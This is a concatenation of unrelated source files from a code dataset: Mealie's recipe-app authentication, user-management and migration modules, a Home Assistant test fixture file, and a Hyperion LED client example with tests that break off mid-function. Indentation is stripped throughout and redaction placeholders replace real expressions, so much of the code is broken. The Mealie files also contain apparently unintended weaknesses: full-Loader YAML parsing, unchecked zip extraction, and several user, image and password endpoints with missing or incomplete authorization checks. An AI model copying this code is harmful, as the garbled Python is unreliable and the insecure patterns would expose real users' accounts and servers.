# text_line = data[text_line_record[0][0]: text_line_record[0][1]]
# extract_word_in_line(text_line, text_column_record, 0)
for i in range(len(text_line_record)):
# plt.subplot(len(text_line_record), 1, i + 1)
# plt.imshow(expand_data[text_line_record[i][0]: text_line_record[i][1]], cmap='gray')
# print(text_line_record[i][1] - text_line_record[i][0])
if text_line_record[i][1] - text_line_record[i][0] > 50:
expand_data[text_line_record[i][0]: text_line_record[i][1]] = min_filter(expand_data[text_line_record[i][0]: text_line_record[i][1]])
text_line = expand_data[text_line_record[i][0]: text_line_record[i][1]]
text_column_record = split_text_column(text_line)
text_line = data[text_line_record[i][0]: text_line_record[i][1]]
extract_word_in_line(text_line, text_column_record, i + 1)
# plt.show()
if __name__ == '__main__':
main()
```
|
{
"source": "jeefberkey/mealie",
"score": 3
}
|
#### File: mealie/core/security.py
```python
from datetime import datetime, timedelta
from mealie.schema.user import UserInDB
from jose import jwt
from mealie.core.config import settings
from mealie.db.database import db
from passlib.context import CryptContext
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
ALGORITHM = "HS256"
def create_access_token(data: dict, expires_delta: timedelta = None) -> str:
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=120)
to_encode.update({"exp": expire})
return jwt.encode(to_encode, settings.SECRET, algorithm=ALGORITHM)
def authenticate_user(session, email: str, password: str) -> UserInDB:
user: UserInDB = db.users.get(session, email, "email")
if not user:
return False
if not verify_password(password, user.password):
return False
return user
def verify_password(plain_password: str, hashed_password: str) -> bool:
"""Compares a plain string to a hashed password
Args:
plain_password (str): raw password string
hashed_password (str): hashed password from the database
Returns:
        bool: True if the passwords match, False otherwise
"""
return pwd_context.verify(plain_password, hashed_password)
def get_password_hash(password: str) -> str:
"""Takes in a raw password and hashes it. Used prior to saving
a new password to the database.
Args:
password (str): Password String
Returns:
str: Hashed Password
"""
return pwd_context.hash(password)
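if __name__ == "__main__":
    # Hash/verify round-trip sketch (demo password only; assumes the mealie
    # environment so that settings and passlib are importable):
    hashed = get_password_hash("hunter2")
    print(verify_password("hunter2", hashed))  # True
    print(verify_password("wrong", hashed))    # False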
```
#### File: routes/users/auth.py
```python
from datetime import timedelta
from fastapi import APIRouter, Depends, status
from fastapi.exceptions import HTTPException
from fastapi.security import OAuth2PasswordRequestForm
from mealie.core import security
from mealie.core.security import authenticate_user
from mealie.db.db_setup import generate_session
from mealie.routes.deps import get_current_user
from mealie.schema.snackbar import SnackResponse
from mealie.schema.user import UserInDB
from sqlalchemy.orm.session import Session
router = APIRouter(prefix="/api/auth", tags=["Authentication"])
@router.post("/token/long")
@router.post("/token")
def get_token(
data: OAuth2PasswordRequestForm = Depends(),
session: Session = Depends(generate_session),
):
email = data.username
password = <PASSWORD>
user = authenticate_user(session, email, password)
if not user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token = security.create_access_token(dict(sub=email), timedelta(hours=2))
return SnackResponse.success(
"User Successfully Logged In",
{"access_token": access_token, "token_type": "bearer"},
)
@router.get("/refresh")
async def refresh_token(current_user: UserInDB = Depends(get_current_user)):
""" Use a valid token to get another token"""
access_token = security.create_access_token(data=dict(sub=current_user.email), expires_delta=timedelta(hours=1))
return {"access_token": access_token, "token_type": "bearer"}
```
#### File: routes/users/crud.py
```python
import shutil
from datetime import timedelta
from fastapi import APIRouter, Depends, File, UploadFile
from fastapi.responses import FileResponse
from mealie.core import security
from mealie.core.config import app_dirs, settings
from mealie.core.security import get_password_hash, verify_password
from mealie.db.database import db
from mealie.db.db_setup import generate_session
from mealie.routes.deps import get_current_user
from mealie.schema.snackbar import SnackResponse
from mealie.schema.user import ChangePassword, UserBase, UserIn, UserInDB, UserOut
from sqlalchemy.orm.session import Session
router = APIRouter(prefix="/api/users", tags=["Users"])
@router.post("", response_model=UserOut, status_code=201)
async def create_user(
new_user: UserIn,
current_user=Depends(get_current_user),
session: Session = Depends(generate_session),
):
new_user.password = get_password_hash(<PASSWORD>_<PASSWORD>.password)
data = db.users.create(session, new_user.dict())
return SnackResponse.success(f"User Created: {new_user.full_name}", data)
@router.get("", response_model=list[UserOut])
async def get_all_users(
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
if current_user.admin:
return db.users.get_all(session)
else:
return {"details": "user not authorized"}
@router.get("/self", response_model=UserOut)
async def get_logged_in_user(
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
return current_user.dict()
@router.get("/{id}", response_model=UserOut)
async def get_user_by_id(
id: int,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
return db.users.get(session, id)
@router.put("/{id}/reset-password")
async def reset_user_password(
id: int,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
new_password = get_password_hash(settings.DEFAULT_PASSWORD)
db.users.update_password(session, id, new_password)
return SnackResponse.success("Users Password Reset")
@router.put("/{id}")
async def update_user(
id: int,
new_data: UserBase,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
token = None
if current_user.id == id or current_user.admin:
db.users.update(session, id, new_data.dict())
if current_user.id == id:
access_token = security.create_access_token(data=dict(sub=new_data.email), expires_delta=timedelta(hours=2))
token = {"access_token": access_token, "token_type": "bearer"}
return SnackResponse.success("User Updated", token)
@router.get("/{id}/image")
async def get_user_image(id: str):
""" Returns a users profile picture """
user_dir = app_dirs.USER_DIR.joinpath(id)
for recipe_image in user_dir.glob("profile_image.*"):
return FileResponse(recipe_image)
else:
return False
@router.post("/{id}/image")
async def update_user_image(
id: str,
profile_image: UploadFile = File(...),
current_user: UserInDB = Depends(get_current_user),
):
""" Updates a User Image """
extension = profile_image.filename.split(".")[-1]
app_dirs.USER_DIR.joinpath(id).mkdir(parents=True, exist_ok=True)
try:
        [x.unlink() for x in app_dirs.USER_DIR.joinpath(id).glob("profile_image.*")]
    except Exception:
pass
dest = app_dirs.USER_DIR.joinpath(id, f"profile_image.{extension}")
with dest.open("wb") as buffer:
shutil.copyfileobj(profile_image.file, buffer)
    if dest.is_file():
return SnackResponse.success("File uploaded")
else:
return SnackResponse.error("Failure uploading file")
@router.put("/{id}/password")
async def update_password(
id: int,
password_change: ChangePassword,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
""" Resets the User Password"""
match_passwords = verify_password(password_change.<PASSWORD>, <PASSWORD>)
match_id = current_user.id == id
if match_passwords and match_id:
new_password = <PASSWORD>password_hash(password_change.<PASSWORD>)
db.users.update_password(session, id, new_password)
return SnackResponse.success("Password Updated")
else:
return SnackResponse.error("Existing password does not match")
@router.delete("/{id}")
async def delete_user(
id: int,
current_user: UserInDB = Depends(get_current_user),
session: Session = Depends(generate_session),
):
""" Removes a user from the database. Must be the current user or a super user"""
if id == 1:
return SnackResponse.error("Error! Cannot Delete Super User")
if current_user.id == id or current_user.admin:
db.users.delete(session, id)
return SnackResponse.error("User Deleted")
```
#### File: services/migrations/chowdown.py
```python
import shutil
from pathlib import Path
import yaml
from fastapi.logger import logger
from mealie.core.config import app_dirs
from mealie.db.database import db
from mealie.schema.recipe import Recipe
from mealie.services.image.minify import migrate_images
from mealie.utils.unzip import unpack_zip
from sqlalchemy.orm.session import Session
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
def read_chowdown_file(recipe_file: Path) -> Recipe:
"""Parse through the yaml file to try and pull out the relavent information.
Some issues occur when ":" are used in the text. I have no put a lot of effort
into this so there may be better ways of going about it. Currently, I get about 80-90%
of recipes from repos I've tried.
Args:
recipe_file (Path): Path to the .yml file
Returns:
Recipe: Recipe class object
"""
with open(recipe_file, "r") as stream:
        recipe_description: str = ""
recipe_data: dict = {}
try:
for x, item in enumerate(yaml.load_all(stream, Loader=Loader)):
if x == 0:
recipe_data = item
elif x == 1:
recipe_description = str(item)
except yaml.YAMLError:
return
reformat_data = {
"name": recipe_data.get("title"),
"description": recipe_description,
"image": recipe_data.get("image", ""),
"recipeIngredient": recipe_data.get("ingredients"),
"recipeInstructions": recipe_data.get("directions"),
"tags": recipe_data.get("tags").split(","),
}
    reformatted_list = [{"text": instruction} for instruction in reformat_data["recipeInstructions"]]
    reformat_data["recipeInstructions"] = reformatted_list
return Recipe(**reformat_data)
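# Usage sketch (hypothetical path into a Chowdown-style recipe repo):
# recipe = read_chowdown_file(Path("_recipes/pancakes.md"))
# if recipe:
#     print(recipe.name)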
def chowdown_migrate(session: Session, zip_file: Path):
temp_dir = unpack_zip(zip_file)
with temp_dir as dir:
chow_dir = next(Path(dir).iterdir())
image_dir = app_dirs.TEMP_DIR.joinpath(chow_dir, "images")
recipe_dir = app_dirs.TEMP_DIR.joinpath(chow_dir, "_recipes")
failed_recipes = []
successful_recipes = []
for recipe in recipe_dir.glob("*.md"):
try:
new_recipe = read_chowdown_file(recipe)
db.recipes.create(session, new_recipe.dict())
successful_recipes.append(new_recipe.name)
except Exception as inst:
session.rollback()
logger.error(inst)
failed_recipes.append(recipe.stem)
failed_images = []
for image in image_dir.iterdir():
try:
if image.stem not in failed_recipes:
shutil.copy(image, app_dirs.IMG_DIR.joinpath(image.name))
except Exception as inst:
logger.error(inst)
failed_images.append(image.name)
report = {"successful": successful_recipes, "failed": failed_recipes}
migrate_images()
return report
```
#### File: services/migrations/nextcloud.py
```python
import json
import logging
import shutil
import zipfile
from pathlib import Path
from mealie.core.config import app_dirs
from mealie.db.database import db
from mealie.schema.recipe import Recipe
from mealie.services.image import minify
from mealie.services.scraper.cleaner import Cleaner
def process_selection(selection: Path) -> Path:
if selection.is_dir():
return selection
elif selection.suffix == ".zip":
with zipfile.ZipFile(selection, "r") as zip_ref:
nextcloud_dir = app_dirs.TEMP_DIR.joinpath("nextcloud")
nextcloud_dir.mkdir(exist_ok=False, parents=True)
zip_ref.extractall(nextcloud_dir)
return nextcloud_dir
else:
return None
def clean_nextcloud_tags(nextcloud_tags: str):
if not isinstance(nextcloud_tags, str):
return None
return [x.title().lstrip() for x in nextcloud_tags.split(",") if x != ""]
def import_recipes(recipe_dir: Path) -> Recipe:
image = False
for file in recipe_dir.glob("full.*"):
image = file
break
for file in recipe_dir.glob("*.json"):
recipe_file = file
break
with open(recipe_file, "r") as f:
recipe_dict = json.loads(f.read())
recipe_data = Cleaner.clean(recipe_dict)
image_name = recipe_data["slug"]
recipe_data["image"] = recipe_data["slug"]
recipe_data["tags"] = clean_nextcloud_tags(recipe_data.get("keywords"))
recipe = Recipe(**recipe_data)
if image:
shutil.copy(image, app_dirs.IMG_DIR.joinpath(image_name + image.suffix))
return recipe
def prep():
shutil.rmtree(app_dirs.TEMP_DIR, ignore_errors=True)
app_dirs.TEMP_DIR.mkdir(exist_ok=True, parents=True)
def cleanup():
shutil.rmtree(app_dirs.TEMP_DIR)
def migrate(session, selection: str):
prep()
app_dirs.MIGRATION_DIR.mkdir(exist_ok=True)
selection = app_dirs.MIGRATION_DIR.joinpath(selection)
nextcloud_dir = process_selection(selection)
successful_imports = []
failed_imports = []
for dir in nextcloud_dir.iterdir():
if dir.is_dir():
try:
recipe = import_recipes(dir)
db.recipes.create(session, recipe.dict())
successful_imports.append(recipe.name)
except Exception:
session.rollback()
logging.error(f"Failed Nextcloud Import: {dir.name}")
logging.exception("")
failed_imports.append(dir.name)
cleanup()
minify.migrate_images()
return {"successful": successful_imports, "failed": failed_imports}
```
|
{
"source": "jeeftor/core",
"score": 2
}
|
#### File: tests/components/conftest.py
```python
from collections.abc import Generator
from unittest.mock import AsyncMock, patch
import pytest
from homeassistant.core import HomeAssistant
from homeassistant.util.unit_system import IMPERIAL_SYSTEM
@pytest.fixture(scope="session", autouse=True)
def patch_zeroconf_multiple_catcher():
"""Patch zeroconf wrapper that detects if multiple instances are used."""
with patch(
"homeassistant.components.zeroconf.install_multiple_zeroconf_catcher",
side_effect=lambda zc: None,
):
yield
@pytest.fixture(autouse=True)
def prevent_io():
"""Fixture to prevent certain I/O from happening."""
with patch(
"homeassistant.components.http.ban.async_load_ip_bans_config",
return_value=[],
):
yield
@pytest.fixture
def entity_registry_enabled_by_default() -> Generator[AsyncMock, None, None]:
"""Test fixture that ensures all entities are enabled in the registry."""
with patch(
"homeassistant.helpers.entity.Entity.entity_registry_enabled_default",
return_value=True,
) as mock_entity_registry_enabled_by_default:
yield mock_entity_registry_enabled_by_default
@pytest.fixture
def units_imperial(hass: HomeAssistant) -> Generator[None, None, None]:
"""Fixture to temporary change units to imperial."""
with patch.object(hass.config, "units", IMPERIAL_SYSTEM):
yield
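# Example of a test leaning on these fixtures (a sketch; the test body is
# illustrative): requesting `units_imperial` flips hass.config.units for the
# duration of the test.
# async def test_reports_imperial(hass: HomeAssistant, units_imperial) -> None:
#     assert hass.config.units is IMPERIAL_SYSTEM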
```
|
{
"source": "jeeftor/hyperion-py",
"score": 3
}
|
#### File: hyperion-py/examples/doc-example-5.py
```python
import asyncio
import logging
import sys
from hyperion import client
HOST = "hyperion"
PRIORITY = 20
async def set_color() -> None:
"""Set red color on Hyperion."""
async with client.HyperionClient(HOST) as hc:
assert hc
if not await hc.async_client_connect():
logging.error("Could not connect to: %s", HOST)
return
if not client.ResponseOK(
await hc.async_clear(priority=PRIORITY)
) or not client.ResponseOK(
await hc.async_set_color(
color=[255, 0, 0], priority=PRIORITY, origin=sys.argv[0]
)
):
logging.error("Could not clear/set_color on: %s", HOST)
return
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
asyncio.get_event_loop().run_until_complete(set_color())
```
#### File: hyperion-py/tests/client_test.py
```python
from __future__ import annotations
import asyncio
from dataclasses import dataclass
import inspect
import json
import logging
import os
import string
from typing import Any, AsyncGenerator, cast
from unittest.mock import Mock, call, patch
import pytest
from hyperion import client, const
logging.basicConfig()
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(logging.DEBUG)
PATH_TESTDATA = os.path.join(os.path.dirname(__file__), "testdata")
TEST_HOST = "test"
TEST_PORT = 65000
TEST_TOKEN = "FA<PASSWORD>TOKEN"
TEST_INSTANCE = 1
FILE_SERVERINFO_RESPONSE = "serverinfo_response_1.json"
SERVERINFO_REQUEST = {
"command": "serverinfo",
"subscribe": [
"adjustment-update",
"components-update",
"effects-update",
"leds-update",
"imageToLedMapping-update",
"instance-update",
"priorities-update",
"sessions-update",
"videomode-update",
],
"tan": 1,
}
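# "tan" is Hyperion's transaction number: responses are matched to requests by
# it, which several tests below exercise (see test_using_custom_tan and the
# mismatched-tan timeout case in test_send_and_receive).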
TEST_SYSINFO_ID = "f9aab089-f85a-55cf-b7c1-222a72faebe9"
TEST_SYSINFO_VERSION = "2.0.0-alpha.8"
TEST_SYSINFO_RESPONSE = {
"command": "sysinfo",
"info": {
"hyperion": {
"build": "fix-request-tan (GitHub-78458e44/5d5b2497-1601058791)",
"gitremote": "https://github.com/hyperion-project/hyperion.ng.git",
"id": TEST_SYSINFO_ID,
"time": "Sep 29 2020 12:33:00",
"version": TEST_SYSINFO_VERSION,
},
"system": {
"architecture": "arm",
"domainName": "domain",
"hostName": "hyperion",
"kernelType": "linux",
"kernelVersion": "5.4.51-v7l+",
"prettyName": "Raspbian GNU/Linux 10 (buster)",
"productType": "raspbian",
"productVersion": "10",
"wordSize": "32",
},
},
"success": True,
}
def _get_test_filepath(filename: str) -> str:
return os.path.join(PATH_TESTDATA, filename)
def _read_file(filename: str) -> Any:
with open(_get_test_filepath(filename)) as handle:
data = handle.read()
return json.loads(data)
async def _exhaust_callbacks(event_loop: asyncio.AbstractEventLoop) -> None:
"""Run the loop until all ready callbacks are executed."""
loop = cast(asyncio.BaseEventLoop, event_loop)
while loop._ready: # type: ignore[attr-defined]
        await asyncio.sleep(0)  # the "loop" kwarg was removed in Python 3.10
class MockStreamReaderWriter:
"""A simple mocl StreamReader and StreamWriter."""
def __init__(self, flow: list[tuple[str, Any]] | None = None) -> None:
"""Initializse the mock."""
self._flow = flow or []
self._read_cv = asyncio.Condition()
self._write_cv = asyncio.Condition()
self._flow_cv = asyncio.Condition()
self._data_to_drain: bytes | None = None
async def add_flow(self, flow: list[tuple[str, Any]]) -> None:
"""Add expected calls to the flow."""
async with self._flow_cv:
self._flow.extend(flow)
await self.unblock_read()
await self.unblock_write()
async def unblock_read(self) -> None:
"""Unblock the read call."""
async with self._read_cv:
self._read_cv.notify_all()
async def unblock_write(self) -> None:
"""Unblock the write call."""
async with self._write_cv:
self._write_cv.notify_all()
async def block_read(self) -> None:
"""Block the read call."""
async with self._read_cv:
await self._read_cv.wait()
async def block_write(self) -> None:
"""Block the write call."""
async with self._write_cv:
await self._write_cv.wait()
async def block_until_flow_empty(self) -> None:
"""Block until the flow has been consumed."""
async with self._flow_cv:
await self._flow_cv.wait_for(lambda: not self._flow)
async def assert_flow_finished(self) -> None:
"""Assert that the flow has been consumed."""
async with self._flow_cv:
assert not self._flow
@classmethod
def _to_json_line(cls, data: Any) -> bytes:
"""Convert data to an encoded JSON string."""
if isinstance(data, str):
return data.encode("UTF-8")
return (json.dumps(data, sort_keys=True) + "\n").encode("UTF-8")
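    # Example: _to_json_line({"b": 2, "a": 1}) == b'{"a": 1, "b": 2}\n'
    # (keys sorted, newline-terminated, UTF-8 encoded); a str input is
    # encoded as-is, without a trailing newline.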
async def _pop_flow(self) -> tuple[str, Any]:
"""Remove an item from the front of the flow and notify."""
async with self._flow_cv:
if not self._flow:
                # Use error() rather than exception(): no exception is active here.
                _LOGGER.error("Unexpected empty flow")
raise AssertionError("Unexpected empty flow")
item = self._flow.pop(0)
self._flow_cv.notify_all()
return item
async def readline(self) -> bytes:
"""Read a line from the mock.
Will block indefinitely if no read call is available.
"""
_LOGGER.debug("MockStreamReaderWriter: readline()")
while True:
should_block = False
async with self._flow_cv:
if not self._flow:
should_block = True
else:
cmd = self._flow[0][0]
if cmd != "read":
should_block = True
if should_block:
await self.block_read()
continue
cmd, data = await self._pop_flow()
await self.unblock_write()
            _LOGGER.debug(
                "MockStreamReaderWriter: readline() -> %s[...]", str(data)[:100]
            )
if isinstance(data, Exception):
raise data
return MockStreamReaderWriter._to_json_line(data)
def close(self) -> None:
"""Close the mock."""
async def wait_closed(self) -> None:
"""Wait for the close to complete."""
_LOGGER.debug("MockStreamReaderWriter: wait_closed()")
cmd, data = await self._pop_flow()
assert cmd == "close", "wait_closed() called unexpectedly"
if isinstance(data, Exception):
raise data
def write(self, data_in: bytes) -> None:
"""Write data to the mock."""
_LOGGER.debug("MockStreamReaderWriter: write(%s)", data_in)
assert self._data_to_drain is None
self._data_to_drain = data_in
async def drain(self) -> None:
"""Drain the most recent write to the mock.
        Will block if the expected write appears later in the flow but is not
        the next flow item (other flow items must be consumed first).
"""
_LOGGER.debug("MockStreamReaderWriter: drain()")
while True:
assert self._data_to_drain is not None
async with self._flow_cv:
assert (
len(self._flow) > 0
), f"drain() called unexpectedly: {self._data_to_drain!r}"
cmd, data = self._flow[0]
should_block = False
if cmd != "write":
async with self._flow_cv:
for cmd_i, data_i in self._flow[1:]:
if cmd_i == "write":
assert json.loads(self._data_to_drain) == data_i
should_block = True
break
else:
raise AssertionError(
f"Unexpected call to drain with data "
f'"{self._data_to_drain!r}", expected "{cmd}" with data '
f'"{data!r}"'
)
if should_block:
await self.block_write()
continue
assert self._data_to_drain is not None
if isinstance(data, Exception):
# 'data' is an exception, raise it.
await self._pop_flow()
raise data
if callable(data):
# 'data' is a callable, call it with the decoded data.
try:
data_in = json.loads(self._data_to_drain)
except json.decoder.JSONDecodeError:
data_in = self._data_to_drain
assert data(data_in)
else:
# 'data' is just data. Direct compare.
assert self._data_to_drain == MockStreamReaderWriter._to_json_line(data)
self._data_to_drain = None
await self._pop_flow()
await self.unblock_read()
break
# This is inspired by asynctest.ClockedTestCase (which this code originally used). This
# functionality is not natively supported in pytest-asyncio. The below is inspired by a
# PR for pytest-asyncio that implements similar clock "advancing":
#
# https://github.com/pytest-dev/pytest-asyncio/pull/113
class EventLoopClockAdvancer:
"""Allow advancing of loop time."""
__slots__ = ("offset", "loop", "_base_time")
def __init__(self, loop: asyncio.AbstractEventLoop) -> None:
"""Initialize."""
self.offset = 0.0
self._base_time = loop.time
self.loop = loop
# incorporate offset timing into the event loop
self.loop.time = self.time # type: ignore[assignment]
def time(self) -> float:
"""Return loop time adjusted by offset."""
return self._base_time() + self.offset
async def __call__(self, seconds: float) -> None:
"""Advance time by a given offset in seconds."""
# Exhaust all callbacks.
await _exhaust_callbacks(self.loop)
if seconds > 0:
# advance the clock by the given offset
self.offset += seconds
# Once the clock is adjusted, new tasks may have just been
# scheduled for running in the next pass through the event loop
await _exhaust_callbacks(self.loop)
@pytest.fixture
def advance_time(event_loop: asyncio.AbstractEventLoop) -> EventLoopClockAdvancer:
"""Advance loop time."""
return EventLoopClockAdvancer(event_loop)
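# Usage sketch (mirrors the timeout tests below): instead of sleeping in real
# time, advance the mocked loop clock so pending timeouts fire, e.g.
#
#   task = asyncio.create_task(hc.async_get_serverinfo())
#   await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
#   assert not await task  # the request timed out without any real waiting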
async def _block_until_done(rw: MockStreamReaderWriter) -> None:
await rw.block_until_flow_empty()
await _exhaust_callbacks(asyncio.get_event_loop())
async def _disconnect_and_assert_finished(
rw: MockStreamReaderWriter, hc: client.HyperionClient
) -> None:
"""Disconnect and assert clean disconnection."""
await rw.add_flow([("close", None)])
assert await hc.async_client_disconnect()
await _block_until_done(rw)
assert not hc.is_connected
await rw.assert_flow_finished()
async def _create_client_and_connect(
rw: MockStreamReaderWriter,
*args: Any,
**kwargs: Any,
) -> client.HyperionClient:
"""Create a HyperionClient and connect it."""
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(
TEST_HOST,
TEST_PORT,
*args,
**kwargs,
)
assert await hc.async_client_connect()
assert hc.is_connected
return hc
@pytest.fixture
async def rw(
event_loop: asyncio.AbstractEventLoop,
) -> AsyncGenerator[MockStreamReaderWriter, None]:
"""Create a basic connected client object."""
yield MockStreamReaderWriter(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 1}}),
("read", {**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 1}}),
]
)
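# The flow above mirrors a successful handshake: the client writes a
# serverinfo request (tan 1) and reads back the canned serverinfo response.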
@dataclass
class HyperionFixture:
"""Data from a HyperionFixture."""
rw: MockStreamReaderWriter
hc: client.HyperionClient
@pytest.fixture
async def hyperion_fixture(
event_loop: asyncio.AbstractEventLoop,
rw: MockStreamReaderWriter,
) -> AsyncGenerator[HyperionFixture, None]:
"""Create a basic connected client object."""
hc = await _create_client_and_connect(rw)
await rw.assert_flow_finished()
yield HyperionFixture(rw, hc)
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_async_client_connect_success(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test async connection to server."""
@pytest.mark.asyncio
async def test_async_client_connect_failure(
event_loop: asyncio.AbstractEventLoop,
) -> None:
"""Test failed connection to server."""
# == Try to connect when the token fails.
authorize_request = {
"command": "authorize",
"subcommand": "login",
"token": <PASSWORD>_TOKEN,
}
authorize_response = {"command": "authorize-login", "success": False}
rw = MockStreamReaderWriter(
[
("write", {**authorize_request, **{"tan": 1}}),
("read", {**authorize_response, **{"tan": 1}}),
("close", None),
]
)
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(TEST_HOST, TEST_PORT, token=TEST_TOKEN)
assert not await hc.async_client_connect()
assert not hc.is_connected
await rw.assert_flow_finished()
# == Try to connect when the instance selection fails.
instance_request = {
"command": "instance",
"instance": TEST_INSTANCE,
"subcommand": "switchTo",
}
instance_response = {
"command": "instance-switchTo",
"success": False,
"info": {"instance": TEST_INSTANCE},
}
rw = MockStreamReaderWriter(
[
("write", {**instance_request, **{"tan": 1}}),
("read", {**instance_response, **{"tan": 1}}),
("close", None),
]
)
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(TEST_HOST, TEST_PORT, instance=TEST_INSTANCE)
assert not await hc.async_client_connect()
assert not hc.is_connected
await rw.assert_flow_finished()
# == Try to connect when the serverinfo (state load) call fails.
rw = MockStreamReaderWriter(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 1}}),
(
"read",
{
**_read_file(FILE_SERVERINFO_RESPONSE),
**{"tan": 1, "success": False},
},
),
("close", None),
]
)
with patch("asyncio.open_connection", return_value=(rw, rw)):
hc = client.HyperionClient(TEST_HOST, TEST_PORT)
assert not await hc.async_client_connect()
assert not hc.is_connected
await rw.assert_flow_finished()
@pytest.mark.asyncio
async def test_async_client_connect_specified_instance(
event_loop: asyncio.AbstractEventLoop,
) -> None:
"""Test server connection to specified instance."""
instance_request = {
"command": "instance",
"instance": TEST_INSTANCE,
"subcommand": "switchTo",
}
instance_response = {
"command": "instance-switchTo",
"success": True,
"info": {"instance": TEST_INSTANCE},
}
rw = MockStreamReaderWriter(
[
("write", {**instance_request, **{"tan": 1}}),
("read", {**instance_response, **{"tan": 1}}),
("write", {**SERVERINFO_REQUEST, **{"tan": 2}}),
("read", {**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 2}}),
]
)
hc = await _create_client_and_connect(rw, instance=TEST_INSTANCE)
assert hc.instance == TEST_INSTANCE
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_async_client_connect_raw(event_loop: asyncio.AbstractEventLoop) -> None:
"""Test a raw connection."""
rw = MockStreamReaderWriter()
hc = await _create_client_and_connect(
rw,
instance=TEST_INSTANCE,
token=TEST_TOKEN,
raw_connection=True,
)
    # It's a raw connection: it will not be logged in, nor will an
    # instance be selected.
assert hc.is_connected
assert not hc.is_logged_in
assert hc.instance == const.DEFAULT_INSTANCE
assert not hc.has_loaded_state
# Manually log in.
auth_login_in = {
"command": "authorize",
"subcommand": "login",
"token": TEST_TOKEN,
"tan": 1,
}
auth_login_out = {"command": "authorize-login", "success": True, "tan": 1}
await rw.add_flow([("write", auth_login_in), ("read", auth_login_out)])
assert await hc.async_client_login()
# Manually switch instance (and get serverinfo automatically).
switch_in = {
"command": "instance",
"subcommand": "switchTo",
"instance": TEST_INSTANCE,
"tan": 2,
}
switch_out = {
"command": "instance-switchTo",
"info": {"instance": TEST_INSTANCE},
"success": True,
"tan": 2,
}
await rw.add_flow(
[
("write", switch_in),
("read", switch_out),
("write", {**SERVERINFO_REQUEST, **{"tan": 3}}),
("read", {**_read_file(FILE_SERVERINFO_RESPONSE), **{"tan": 3}}),
]
)
assert await hc.async_client_switch_instance()
assert await hc.async_get_serverinfo()
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_instance_switch_causes_empty_state(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test that an instance will have no state after an instance switch."""
hc = await _create_client_and_connect(rw)
assert hc.instance == const.DEFAULT_INSTANCE
instance = 1
instance_switchto_request = {
"command": "instance",
"subcommand": "switchTo",
"instance": instance,
}
instance_switchto_response = {
"command": "instance-switchTo",
"info": {"instance": instance},
"success": True,
}
await rw.add_flow(
[
("write", instance_switchto_request),
("read", instance_switchto_response),
]
)
assert await hc.async_send_switch_instance(instance=instance)
await rw.block_until_flow_empty()
assert hc.is_connected
assert hc.instance == instance
assert hc.target_instance == instance
assert not hc.has_loaded_state
await _disconnect_and_assert_finished(rw, hc)
# Ensure there is no live instance, but that the target instance is the
# one that was switched to.
assert hc.target_instance == instance
assert hc.instance is None
@pytest.mark.asyncio
async def test_receive_wrong_data_type(
event_loop: asyncio.AbstractEventLoop, advance_time: EventLoopClockAdvancer
) -> None:
"""Test that receiving the wrong data-type is handled."""
rw = MockStreamReaderWriter(
[
("write", {**SERVERINFO_REQUEST, **{"tan": 1}}),
]
)
hc = await _create_client_and_connect(rw, raw_connection=True)
task = asyncio.create_task(hc.async_get_serverinfo())
await rw.block_until_flow_empty()
await rw.add_flow(
[
("read", ["this", "is", "not", "a", "dict"]),
]
)
await advance_time(const.DEFAULT_TIMEOUT_SECS)
assert not await task
await _disconnect_and_assert_finished(rw, hc)
@pytest.mark.asyncio
async def test_is_on(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test the client reports correctly on whether components are on."""
hc = hyperion_fixture.hc
with open(_get_test_filepath(FILE_SERVERINFO_RESPONSE)) as fh:
serverinfo_command_response = fh.readline()
serverinfo = json.loads(serverinfo_command_response)
# Verify server info is as expected.
assert hc.serverinfo == serverinfo[const.KEY_INFO]
# Verify the individual components.
assert hc.is_on(components=[const.KEY_COMPONENTID_ALL])
assert hc.is_on(components=[const.KEY_COMPONENTID_SMOOTHING])
assert hc.is_on(components=[const.KEY_COMPONENTID_BLACKBORDER])
assert not hc.is_on(components=[const.KEY_COMPONENTID_FORWARDER])
assert not hc.is_on(components=[const.KEY_COMPONENTID_BOBLIGHTSERVER])
assert not hc.is_on(components=[const.KEY_COMPONENTID_GRABBER])
assert hc.is_on(components=[const.KEY_COMPONENTID_V4L])
assert hc.is_on(components=[const.KEY_COMPONENTID_LEDDEVICE])
# Verify combinations.
assert hc.is_on(
components=[
const.KEY_COMPONENTID_ALL,
const.KEY_COMPONENTID_SMOOTHING,
const.KEY_COMPONENTID_BLACKBORDER,
]
)
assert not hc.is_on(
components=[
const.KEY_COMPONENTID_ALL,
const.KEY_COMPONENTID_GRABBER,
const.KEY_COMPONENTID_BLACKBORDER,
]
)
# Verify default.
assert hc.is_on()
@pytest.mark.asyncio
async def test_update_component(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test updating components."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
